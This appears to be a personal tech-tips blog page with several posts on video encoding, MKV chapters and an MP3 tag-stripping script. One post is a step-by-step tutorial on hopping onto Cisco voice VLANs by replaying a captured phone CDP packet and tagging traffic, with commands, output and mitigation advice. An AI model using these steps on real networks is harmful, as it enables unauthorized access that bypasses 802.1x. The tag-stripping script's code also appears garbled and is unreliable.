Using Mencoder Profiles

Posted by admin on January 21, 2015 under Tech Tips | 5 Comments to Read

Here’s a quick tip on using Mencoder profiles that serve as shortcuts for all of your favorite settings. This can save you a lot of time, especially when your encoding syntax is lengthy and difficult to remember.

Profiles are stored in the mencoder.conf file located in the appropriate place for your operating system. For Linux users, you can create a personalized file in your own home directory, ~/.mplayer/mencoder.conf.

Here’s the syntax you might use on a single-pass XviD project without using profiles.

mencoder -oac mp3lame -lameopts aq=0:q=0 -ovc xvid -xvidencopts
input.avi -o output.avi

Compare that with the following examples of some of my favorite profiles, and how easy it is to use them.

XviD Single-pass Profile Example

profile-desc="MPEG4/MP3 encoding"

mencoder -profile xvid input.avi -o output.avi

XviD 2-pass Profile Examples

profile-desc="MPEG4/MP3 encoding - PASS 1"

profile-desc="MPEG4/MP3 encoding - PASS 2"

mencoder -profile xvid-pass1 input.avi
mencoder -profile xvid-pass2 input.avi -o output.avi

x264 2-pass Profile Examples

profile-desc="x264 encoding - PASS 1"

profile-desc="x264 encoding - PASS 2"

mencoder -profile x264-pass1 input.avi
mencoder -profile x264-pass2 input.avi -o output.avi

x264 Single-pass Profile Example

profile-desc="x264 encoding"

mencoder -profile x264 input.avi -o output.avi

Adding Chapters to Videos Using MKV Containers

Posted by admin on November 4, 2014 under Tech Tips | 4 Comments to Read

If you would like to add chapters to your video files, such as XviD, x264, OGG, etc., simply use the Matroska multimedia container format.

For those of you that have never created Matroska files, visit the Matroska website to find the right software for your platform. If you’re using Ubuntu Linux, install the mkvtoolnix package from the repositories. It contains all the tools you need to start working with MKV files.

sudo apt-get-install mkvtoolnix

The easiest method of creating your chapter definitions is with any text editor, using the following format. Feel free to change the name and time values accordingly. Save the file anywhere you can remember, e.g. chapter.txt.

CHAPTER01NAME=Chapter 01
CHAPTER02NAME=Chapter 02
CHAPTER03NAME=Chapter 03
CHAPTER04NAME=Chapter 04
CHAPTER05NAME=Chapter 05

If you want to create a chapter file from an existing DVD, dvdxchap is a great tool for the job if you’re using Linux. It’s part of the ogmtools package. For more info, check out the OGMtools project web site.

Installation and three examples of how to use the tool are below.

sudo apt-get install ogmtools

dvdxchap /dev/dvd > chapter.txt
dvdxchap ./VIDEO_TS/ > chapter.txt
dvdxchap video.iso > chapter.txt

mkvmerge is the only tool you need to create an MKV file. In the following examples, your source video file is called video.avi, and your destination file is video.mkv.

A simplified version of the mkvmerge syntax is as follows.

mkvmerge video.avi --chapters chapter.txt -o video.mkv

I typically like to set my default language to English, and also turn off header compression for all tracks since some players don’t play nicely with compression enabled. The syntax and example output is displayed below.

mkvmerge video.avi --default-language eng
--compression -1:none --chapters chapter.txt -o video.mkv

mkvmerge v4.2.0 ('No Talking') built on Jul 28 2010 16:47:39
'video.avi': Using the AVI demultiplexer. Opening file. This may take some time depending on the file's size.
'video.avi' track 0: Using the MPEG-4 part 2 video output module.
'video.avi' track 1: Using the MPEG audio output module.
The file 'video.mkv' has been opened for writing.
'video.avi' track 0: Extracted the aspect ratio information from the MPEG4 layer 2 video data and set the display dimensions to 712/416.
Progress: 100%
The cue entries (the index) are being written...
Muxing took 30 seconds.

That’s really all there is to it. Now any media player that supports MKV chapters will allow you to navigate them. My favorites are VLC, Mplayer, and my Western Digital media player, the WD TV Live Plus.

Verify the contents of your MKV using mkvmerge or mkvinfo.

mkvmerge -i video.mkv
File 'video.mkv': container: Matroska
Track ID 1: video (V_MS/VFW/FOURCC, XVID)
Track ID 2: audio (A_MPEG/L3)
Chapters: 13 entries

mkvinfo video.mkv
+ EBML head
|+ EBML version: 1
|+ EBML read version: 1
|+ EBML maximum ID length: 4
|+ EBML maximum size length: 8
|+ Doc type: matroska
|+ Doc type version: 2
|+ Doc type read version: 2
+ Segment, size 1325519138
|+ Seek head (subentries will be skipped)
|+ EbmlVoid (size: 4029)
|+ Segment information
| + Timecode scale: 1000000
| + Muxing application: libebml v1.0.0 + libmatroska v1.0.0
| + Writing application: mkvmerge v4.2.0 ('No Talking') built on Jul 28 2010 16:47:39
| + Duration: 5004.680s (01:23:24.680)
| + Date: Thu Aug 5 00:26:03 2010 UTC
| + Segment UID: 0x81 0x4b 0xc4 0xf1 0xf4 0x5b 0x6d 0xda 0xc5 0x40 0xc1 0x03 0x3f 0x36 0x0f 0xd9
|+ Segment tracks
| + A track
| + Track number: 1
| + Track UID: 1318207700
| + Track type: video
| + Lacing flag: 0
| + MinCache: 1
| + CodecPrivate, length 40 (FourCC: XVID, 0x44495658)
| + Default duration: 40.000ms (25.000 fps for a video track)
| + Video track
| + Pixel width: 480
| + Pixel height: 416
| + Display width: 712
| + Display height: 416
| + A track
| + Track number: 2
| + Track UID: 3206714560
| + Track type: audio
| + Codec ID: A_MPEG/L3
| + Default duration: 24.000ms (41.667 fps for a video track)
| + Audio track
| + Sampling frequency: 48000
| + Channels: 2
|+ EbmlVoid (size: 1099)
|+ Chapters
| + EditionEntry
| + EditionFlagHidden: 0
| + EditionFlagDefault: 0
| + EditionUID: 585228242
| + ChapterAtom
| + ChapterUID: 4059317607
| + ChapterTimeStart: 00:00:00.000000000
| + ChapterFlagHidden: 0
| + ChapterFlagEnabled: 1
| + ChapterDisplay
| + ChapterString: Chapter 01
| + ChapterLanguage: eng
| + ChapterAtom
| + ChapterUID: 3065648262
| + ChapterTimeStart: 00:05:00.000000000
| + ChapterFlagHidden: 0
| + ChapterFlagEnabled: 1
| + ChapterDisplay
| + ChapterString: Chapter 02
| + ChapterLanguage: eng
| + ChapterAtom
| + ChapterUID: 2388361707
| + ChapterTimeStart: 00:10:00.000000000
| + ChapterFlagHidden: 0
| + ChapterFlagEnabled: 1
| + ChapterDisplay
| + ChapterString: Chapter 03
| + ChapterLanguage: eng
| + ChapterAtom
| + ChapterUID: 1448933008
| + ChapterTimeStart: 00:15:00.000000000
| + ChapterFlagHidden: 0
| + ChapterFlagEnabled: 1
| + ChapterDisplay
| + ChapterString: Chapter 04
| + ChapterLanguage: eng
| + ChapterAtom
| + ChapterUID: 1319721142
| + ChapterTimeStart: 00:20:00.000000000
| + ChapterFlagHidden: 0
| + ChapterFlagEnabled: 1
| + ChapterDisplay
| + ChapterString: Chapter 05
| + ChapterLanguage: eng
|+ EbmlVoid (size: 101)
|+ Cluster

Strip All Unwanted MP3 ID3 Tags

Posted by admin on June 20, 2014 under Tech Tips | 14 Comments to Read

A while back, I wanted to find a tool that would go through my entire collection of MP3’s and remove all the extra ID3 tags I didn’t want. For example, when I purchase music from Amazon, Rhapsody, and other online music stores, there are a number of tags in the files that track things like the purchase date and sales transaction ID’s. I also like to get rid of annoying comments and other hidden tags that most editors won’t even show you.

In my search for a tool, I came across this very useful post outlining a similar project. In the authors quest to do the same thing, he came up with a shell script that searches for all MP3 files, and removes tags that are not in his list of “good” tags. I usually don’t like to rehash the work someone else has done, but since I use his script so often, I thought it would be useful to repost it with only minor modifications.

Prerequisite: Install eyeD3

The script requires the eyeD3 tag editor to parse and manipulate the tag data. So be sure to install eyeD3, which should be available in your favorite Linux repository.

sudo apt-get install eyed3

Save and Modify Script

Save the following script as somewhere in your executable path.

# Script name:
# Original Author: Ian of DarkStarShout Blog
# Site:
# Options slightly modified to liking of
#Determine tags present:
find . -iname "*.mp3" -exec eyeD3 --no-color -v {} ; > $indexfile
tagspresent=`sort -u $indexfile | awk -F): '/^<.*$/ {print $1}' 
| uniq | awk -F)> '{print $1}' | awk -F( '{print $(NF)}' 
| awk 'BEGIN {ORS=" "} {print $0}'`
rm $indexfile
#Determine tags to strip:
tostrip=`echo -n $tagspresent $oktags $oktags 
| awk 'BEGIN {RS=" "; ORS="n"} {print $0}' | sort | uniq -u 
| awk 'BEGIN {ORS=" "} {print $0}'`
#Confirm action:
echo The following tags have been found in the mp3s:
echo $tagspresent
echo These tags are to be stripped:
echo $tostrip
echo -n Press enter to confirm, or Ctrl+C to cancel...
read dummy
#Strip 'em
stripstring=`echo $tostrip 
| awk 'BEGIN {FS="n"; RS=" "} {print "--set-text-frame=" $1 ": "}'`
# First pass copies any v1.x tags to v2.3 and strips unwanted tag data.
# Second pass removes v1.x tags, since I don't like to use them.
# Without --no-tagging-time-frame, a new unwanted tag is added.  :-)
find . -iname "*.mp3" 
-exec eyeD3 --to-v2.3 --no-tagging-time-frame $stripstring {} ; 
-exec eyeD3 --remove-v1 --no-tagging-time-frame {} ; 
echo "Script complete!"

To run the script, just execute it from the top level parent directory.

cd ~/Music/

I really didn’t change a whole lot from the original, only making slight tweaks to eyeD3 options. For example, I removed colors from the eyeD3 output when creating the first list of tags, and added a line to remove v1.x ID3 tags since I don’t like to keep them around.

Be sure to edit the list of good tags identified by the “okaytags” variable. My preferred list includes the following:


TALB - Album/Movie/Show title
APIC - Attached picture (Album Art)
TCON - Content type (Genre)
TPE1 - Lead performer(s)/Soloist(s)
TPE2 - Band/orchestra/accompaniment
TPE3 - Conductor/performer refinement
TIT2 - Title/songname/content description
TRCK - Track number/Position in set
TYER - Year
TCOM - Composer
TPOS - Part of a set


VLAN Hopping on Cisco Voice-enabled Switch Ports

Posted by admin on June 15, 2013 under Tech Tips | 5 Comments to Read

There’s a number of reasons why someone would want to gain unauthorized access to your network’s voice VLAN, and as you can guess, none of them are any good. By strategically replaying CDP packets used by Cisco VoIP phones, and configuring your computer’s NIC to use 802.1q tagged packets, you can gain full network access on a Cisco switch port configured with a Voice VLAN. Yes… even those protected by 802.1x authentication. In the following how-to, we’ll demonstrate how exploit this behavior using Linux and freely available open source software.

First, install two packages from your repositories. The vlan package adds a kernel module required for 802.1q VLAN tagging and the vconfig tool used to configure VLAN sub-interfaces. tcpreplay is a packet injection utility that we will use to replay CDP packets into the network from a pcap file.

sudo apt-get install vlan tcpreplay
sudo modprobe 8021q

The second command loads the 8021q kernel module. If you want the module loaded at boot-up, remember to add it to /etc/modules or the appropriate file for your GNU/Linux distribution.

Discover Voice-enabled Switch Port Information

Plug into the switched network, bypassing the VoIP phone, and perform a packet capture to inspect the switches CDP announcements. If the switch port is configured with a Voice VLAN, the configured VLAN identifier will be advertised. From our output below, the switch says we are plugged into port number FastEthernet0/24 and the Voice VLAN number is 64.

sudo tcpdump -s 0 -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
17:17:13.215645 CDPv2, ttl: 180s, checksum: 692 (unverified), length 404
Device-ID (0x01), length: 26 bytes: ''
Version String (0x05), length: 186 bytes:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(50)SE1, RELEASE SOFTWARE (fc2)
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Mon 06-Apr-09 08:36 by amvarma
Platform (0x06), length: 21 bytes: 'cisco WS-C2960-24PC-L'
Address (0x02), length: 13 bytes: IPv4 (1)
Port-ID (0x03), length: 16 bytes: 'FastEthernet0/24'
Capability (0x04), length: 4 bytes: (0x00000028): L2 Switch, IGMP snooping
Protocol-Hello option (0x08), length: 32 bytes:
VTP Management Domain (0x09), length: 9 bytes: 'LABVTP'
Native VLAN ID (0x0a), length: 2 bytes: 1
Duplex (0x0b), length: 1 byte: full
ATA-186 VoIP VLAN request (0x0e), length: 3 bytes: app 1, vlan 64
AVVID trust bitmap (0x12), length: 1 byte: 0x00
AVVID untrusted ports CoS (0x13), length: 1 byte: 0x00
Management Addresses (0x16), length: 13 bytes: IPv4 (1)
unknown field type (0x1a), length: 12 bytes:
0x0000: 0000 0001 0000 0000 ffff ffff

Capture a Sample VoIP phone CDP Packet

Plug the Cisco VoIP phone back into the switch port and wait for it to come back online. Plug your laptop back into the data port of the phone in your typical daisy-chain topology. Use tcpdump again to capture a single CDP packet, saving it to a capture file. If you’re plugged into the phone, the only CDP packets you should see are those sent by the phone. These CDP packets should be neatly constructed with all of the appropriate voice VLAN values. From the switches perspective (and network administrators monitoring CDP tables), it will look exactly as if a phone is connected to the port, down to the phone model and serial number. 😉

The following tcpdump filter looks for the CDP destination MAC address, stops after one packet, and saves it to a file called cdp-packet.cap. You will use this CDP packet capture file in your replay attack.

sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
1 packets captured
1 packets received by filter
0 packets dropped by kernel

Verify the CDP packet details by reading the capture file with tcpdump. The following shows that everything is in order, including the VoIP VLAN Request for VLAN 64, which highlighted below.

sudo tcpdump -vr cdp-packet.cap
reading from file cdp-packet.cap, link-type EN10MB (Ethernet)
09:44:42.263551 CDPv2, ttl: 180s, checksum: 692 (unverified), length 125
Device-ID (0x01), length: 15 bytes: 'SEP0015626A51E9'
Address (0x02), length: 13 bytes: IPv4 (1)
Port-ID (0x03), length: 6 bytes: 'Port 2'
Capability (0x04), length: 4 bytes: (0x00000490): L3 capable
Version String (0x05), length: 12 bytes:
Platform (0x06), length: 19 bytes: 'Cisco IP Phone 7940'
Native VLAN ID (0x0a), length: 2 bytes: 1
Duplex (0x0b), length: 1 byte: full
ATA-186 VoIP VLAN request (0x0e), length: 3 bytes: app 1, vlan 64
AVVID trust bitmap (0x12), length: 1 byte: 0x00
AVVID untrusted ports CoS (0x13), length: 1 byte: 0x00

Replay CDP Packets to Spoof a Cisco VoIP Phone

You’ll want to unplug the phone from the switch and plug your computer into the switch port directly. Using the tcpreplay command, you can read and inject the contents of the packet capture file from the previous step, effectively spoofing the Cisco VoIP phone. When the switch receives this packet, the voice VLAN will be available to use.

sudo tcpreplay -i eth0 cdp-packet.cap
Actual: 1 packets (147 bytes) sent in 0.06 seconds
Rated: 2450.0 bps, 0.02 Mbps, 16.67 pps
Statistics for network device: eth0
Attempted packets: 1
Successful packets: 1
Failed packets: 0
Retried packets (ENOBUFS): 0
Retried packets (EAGAIN): 0

Once the Voice VLAN is enabled, you will only have a limited amount of time to use it. A typical Cisco phone will send a CDP packet every 60 seconds, so you can simulate this behavior by running your command in a timed loop. I prefer to use the watch command, and leave it running in a terminal until it’s no longer needed. Using the command below, the CDP packet will be replayed every 60 seconds.

sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap"

Access Voice VLAN with 802.1q Sub-interface

In order for you to access the voice VLAN, you must add a sub-interface for eth0 using the vconfig command. The following example uses vconfig to add a sub-interface that tags packets to access VLAN 64. The sub-interface will be named eth0.64 as shown below.

sudo vconfig add eth0 64
Added VLAN with VID == 64 to IF -:eth0:-

ifconfig eth0.64
eth0.64 Link encap:Ethernet HWaddr 00:26:b9:bc:5b:68
RX packets:95 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4370 (4.3 KB) TX bytes:0 (0.0 B)

At this point you can access the VLAN in any fashion you see fit. For example, you can obtain an IP address via DHCP and test communication by pinging your default gateway as shown below.

sudo dhclient3 eth0.64
Listening on LPF/eth0.64/00:26:b9:bc:5b:68
Sending on LPF/eth0.64/00:26:b9:bc:5b:68
Sending on Socket/fallback
DHCPDISCOVER on eth0.64 to port 67 interval 3
DHCPREQUEST of on eth0.64 to port 67
DHCPACK of from
bound to -- renewal in 35707 seconds.

ping -c 4
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=2.88 ms
64 bytes from icmp_seq=2 ttl=64 time=2.85 ms
64 bytes from icmp_seq=3 ttl=64 time=2.84 ms
64 bytes from icmp_seq=4 ttl=64 time=2.30 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 2.303/2.721/2.888/0.244 ms

Mitigation… Aww, Bummer…

Unfortunately, there is currently no way to prevent this method of unauthorized voice VLAN access. Remember, this “vulnerability” is really just a limitation of the voice VLAN negotiation process. It’s not new (see the following Cisco security bulletin from 2005), but I suspect it will become a bigger problem as more organizations begin to deploy VoIP with little thought going into layered defenses and access protection.

However, for network administrators that wish to limit the threat associated to unauthorized voice VLAN access, consider the following recommendations.

1. Enable security features that prevent layer-2/3 man-in-the-middle and other nefarious attacks. DHCP Snooping, Dynamic ARP Inspection, Port-Security, and IP Source Guard will help in keeping attackers from intercepting voice traffic, and a number of other threats associated with layer-2/3 spoofing.

2. Add VLAN access lists and Layer-3 boundary ACL’s limiting clients on the Voice VLAN to access only resources required for VoIP functionality. By limiting voice VLAN communication to the minimum required protocols and port numbers, you will greatly reduce the attack surface for the rest of your network.

3. Apply QoS policies that limit the effects of attempted Denial of Service attacks against the VoIP infrastructure. Auto QoS and even simple Storm Control features can help limit traffic, and actively notify administrators of abnormal traffic patterns.

4. Protect your IP telephony system at the application layer by requiring VoIP phone authentication and encryption.

There are some really cool projects dedicated to exploiting this vulnerability and similar weaknesses by other manufacturers. One such tool called VoIP Hopper completely automates the above process. It even comes with it’s own built-in DHCP client, and is kind enough to automatically generate pre-constructed CDP packets for you.

I hope you have found this tutorial useful. Feel free to add comments, suggestions, or drop me an email for confidential questions!

Extract AC3 Dolby Digital with FFMpeg

Posted by admin on February 21, 2013 under Tech Tips | Be the First to Comment

If you have a source video file encoded with an AC3 Dolby Digital audio stream, you can extract the audio in it’s native format using FFMpeg.

The following example shows how to identify the available audio streams of the file video.avi. Just use ffmpeg without any output options, and you can see there are two streams (0.0 and 0.1), the second is AC3 audio.

ffmpeg -i video.avi
Input #0, avi, from 'video.avi':
Duration: 01:17:57.64, start: 0.000000, bitrate: 1587 kb/s
Stream #0.0: Video: mpeg4, yuv420p, 672x576 (snipped for brevity)
Stream #0.1: Audio: ac3, 48000 Hz, 5.1, s16, 448 kb/s
At least one output file must be specified

The following command will extract the AC3 audio stream to a file called audio.ac3.

ffmpeg -i video.avi -acodec copy audio.ac3
Input #0, avi, from 'video.avi':
Duration: 01:17:57.64, start: 0.000000, bitrate: 1587 kb/s
Stream #0.0: Video: mpeg4, yuv420p, 672x576 (snipped for brevity)
Stream #0.1: Audio: ac3, 48000 Hz, 5.1, s16, 448 kb/s
Output #0, ac3, to 'audio.ac3':
Stream #0.0: Audio: ac3, 48000 Hz, 5.1, s16, 448 kb/s
Stream mapping:
Stream #0.1 -> #0.0
Press [q] to stop encoding
size= 255799kB time=4677.51 bitrate= 448.0kbits/s
video:0kB audio:255799kB global headers:0kB muxing overhead 0.000000%

Verify the file was created. The output below shows that this stream is about 250Mb.

ls -lh audio.ac3
-rw-r--r-- 1 username gmendoza 250M 2010-02-21 09:47 audio.ac3

You can now use ffmpeg again to show that audio.ac3 only contains the ac3 audio stream.

ffmpeg -i audio.ac3
Input #0, ac3, from 'audio.ac3':
Duration: 01:17:57.46, bitrate: 448 kb/s
Stream #0.0: Audio: ac3, 48000 Hz, 5.1, s16, 448 kb/s
At least one output file must be specified

Now that you have extracted the audio stream, you can do anything you wish with it. Enjoy.